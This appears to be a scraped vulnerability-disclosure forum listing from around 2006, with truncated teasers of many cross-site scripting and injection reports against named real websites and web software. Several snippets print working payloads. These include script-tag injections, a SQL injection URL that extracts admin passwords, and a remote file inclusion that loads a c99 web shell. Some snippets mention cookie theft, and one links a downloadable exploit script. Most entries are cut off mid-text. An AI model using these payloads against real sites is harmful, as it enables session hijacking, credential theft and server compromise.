============================
PTT.yu Guestbook Vulnebility
============================
Discovered by: us3rg0d
Mail: us3r_g0d (at) yahoo (dot) com [email concealed]
Site: www.us3rg0d.tk
www.cformatkrew.tk

greetz: m3t4b0l1c,Fu3g0,DELTA,Phantom,NeshYu,
skull_boy,Orwell,MetalBOY,[YesPeace],Intruder,

Loading_3rr0r,DrNoise
f

[ more ]  [ reply ]

MySQL 4.1.11 - affected too

[ more ]  [ reply ]

Technorati.com

Homepage:

http://www.technorati.com

Affected files:

login box

Creating a new account input boxes

Login box XSS vuln:

By escaping quotes and using script tags, we can acomplish our XSS example. For PoC try putting the following code in the login box:

">">">">'>'>'>"

[ more ]  [ reply ]

43things.com

Homepage:

http://www.43things.com

Affected files:

input box "I want to add to my list"

posting a comment

----------------------------------------

XSS vuln via input text of the box "I want to____"

When you add an item thats already on your list.

For a PoC we have s

[ more ]  [ reply ]

Blogspot.com

Homepage:

http://www.blogspot.com

Affected files:

Blog input boxes

------------------------------------------

XSS vuln via Display name input box.

Blogger doesnt properally sanatize user input before generating it. For example, you can't use illegal characters in your u

[ more ]  [ reply ]

http://www.root-security.org/danger/boastMachine.txt

Was this tried on a running site?or was this just source inspected?

in boastmachine folder, the below shouldn't be vulnerable with config.php declaring $bmc_dir.

vote.php

--------------------------------------

include_once dirname(__FILE_

[ more ]  [ reply ]

=============================================

Fund By: Breeeeh

Special for Site:- www.alshmokh.com

nono225-CrAzYCrAcKeR-mHOn-LoverHacker-rageh

Sw33t h4ck3r-BoNy_m-Root shill-LiNuX_rOOt

=============================================

Example:-

/shop/page.php?osCsid=http://yoursite/c99shell.t

[ more ]  [ reply ]

Download: http://sourceforge.net/projects/sinfp/
Info: http://www.gomor.org/sinfp

Mailing list: https://lists.sourceforge.net/lists/listinfo/sinfp-discuss

NEWS FOR 2.00:

- complete rewrite
- sinfp.db completely reworked
- new tests based on comparison between probe and response (TCP seq/ac

[ more ]  [ reply ]

Biblenet.net

Homepage:

http://www.biblenet.net

Affected files:

gettinginvolved.html

register.php

member.php

/library/index.html

-----------------------------------------

Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves

[ more ]  [ reply ]

B3ta.com

Homepage:

http://www.b3ta.com

Affected files:

Input boxes of your profile

XSS vuln with cookie disclosure via Profile: box.

Data isn't correctly sanatized before being generated. We can bypass the filters of the site one way by using img tags and converting our javascript to

[ more ]  [ reply ]

p0w3r ~ curse-crew.de

Examples: [confixx]/ftplogin/[username]/ftp_index.php?path=<script>alert('p0w3r oWnZ')</script>

[ more ]  [ reply ]

Software: Confixx <= 3

Vendor: http://www.swsoft.com/

Discovered by: p0w3r - curse-crew.de

Example: [confixx]/user/[username]/tools_ftp_pwaendern.php?account=<script>alert(
'p0

w3r oWnZ')</script>

[ more ]  [ reply ]

http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2C
admin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search

credits: EntriKa & The_BeKiR & erne

[ more ]  [ reply ]

yes the journal is exploitable aswell

there seem to be no filters on the journal title so you can simply put: "><script>alert('XSS')</script>

also the other places where you can update your journal etc. don't filter anything

proof:

http://vampirefreaks.com/journal.php?u=NanoyMaster

[ more ]  [ reply ]

webcrawler.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://w

[ more ]  [ reply ]

Palm.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://www.maj

[ more ]  [ reply ]

Ratemylook.co.uk

Homepage:

http://www.ratemylook.co.uk

Affected files:

user.php4

top.php4

hot.php4

toponline.php4

------------------------------------------------

user.php4 XSS vuln with cookie disclosure:

http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SC
RIPT

[ more ]  [ reply ]

About.com

Homepage:

http://www.about.com

Effected files:

Search input box

fullsearch.htm

shortform.htm

forum.aspx

profile_center.asp

posting in the forum

-----------------------------------

Search input box xss vuln with cookie disclosure:

Works by putting the <script> tags in the

[ more ]  [ reply ]

Macworld.com - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Rated as: Low Risk

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" V

[ more ]  [ reply ]

Ratescene.co.uk

Homepage:

http://www.ratescene.co.uk

Affected files:

input boxes of editing your profile

------------------------------------------------

Profile input boxes XSS vuln with cookie disclosure:

Data isn't sanatized, try entering the code below:

<img src=javascript:aler

[ more ]  [ reply ]

Facetherating.com

Homepage:

http://www.facetherating.com

Affected files:

showprofile.php

XSS vuln via showprofile.php:

The site does the typical filtering of adding backslashes to ' and " so We'll try something different this time and use a fromCharCode.

http://www.facetherating.co

[ more ]  [ reply ]

Windowsitpro.com

Homepage:

http://www.windowsitpro.com

Effected files:

Search input box

Downloading whitepapers

Search input box xss vuln with cookie disclosure:

We convert our javascript to hex format so we don't recieve the default "Your request cannot be processed as this time" err

[ more ]  [ reply ]

The phpatm support forum (currently down) advises administrators to put a .htaccess into the users directory with the following content:

# no one gets in here!

order allow,deny

deny from all

Furthermore the website recommends to rename the "users" directory and change the corresponding var

[ more ]  [ reply ]

example:

http://www.animesuki.com/doc.php/%3Cscript%3Ealert('hi')%3C/script%3E/

hints:

Cookiestealer, redirect people, <marquee>something</marquee>, general fun

[ more ]  [ reply ]

Facerave.com

Homepage:

http://www.facerave.com

Effected files:

* Profile input boxes

- Self Description box

* Posting a blog entry

* Sending a message

index.php

------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

[ more ]  [ reply ]

# Kurdish Security Advisory

# irc.gigachat.net #kurdhack

# http://www.milw0rm.com/exploits/1905

# Editor DHTML Scripting bugz

$url_path_editor = "$root_url/library/editor/";

$abs_path_editor = "$root/library/editor/";

?>

Proof Of Concept

http://www.site.com/[dcpath]/library/edit

[ more ]  [ reply ]

514.es brings to you the proof of concept for mybb 1.1.2
http://secunia.com/secunia_research/2006-40/advisory/

GET it here: http://www.514.es/download/mybibi.pl

Best regards,

- J

[ more ]  [ reply ]

Vendor : www.roostercode.com

version : all version!

BUG :

You can include all html tag ... in chat line !

for example : <script>alert("HI users!")</script>

+++++

[ more ]  [ reply ]

ISO.org - XSS vulnerability

----------------------------------------------

Type: Cross site scripting

Date: June, 13th 2006

----------------------------------------------

Credits:

----------------------------------------------

Discovered by: David "Aesthetico" Vieira-Kurz

http://www.majo

[ more ]  [ reply ]